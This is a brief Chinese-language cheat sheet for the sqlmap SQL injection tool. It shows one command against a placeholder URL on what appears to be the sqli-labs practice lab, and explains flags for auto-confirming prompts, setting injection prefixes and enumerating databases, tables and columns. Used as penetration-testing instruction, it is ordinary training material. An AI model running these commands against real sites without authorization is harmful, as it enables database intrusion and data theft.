sqlmap参数使用实战教程
sqlmap -u http://xxxxx/sql/Less-1/?id=1 --level 3 --batch y --current-db
-u url ------指定url地址
–level 3 —指定等级为 3 默认为1 等级1-5,最好不要超过 3
–batch y —自动选择yes
–prefix " ') " --添加闭合方式 ')
–dbms=mysql --指定数据库类型为mysql
–current-db ----查看当前数据
当前数据库security
–current-user --查看当前用户
–dbs -----查看所有数据库
-D 指定数据库 爆出所有的表
-D 指定数据库 -T 指定表名,爆出所有列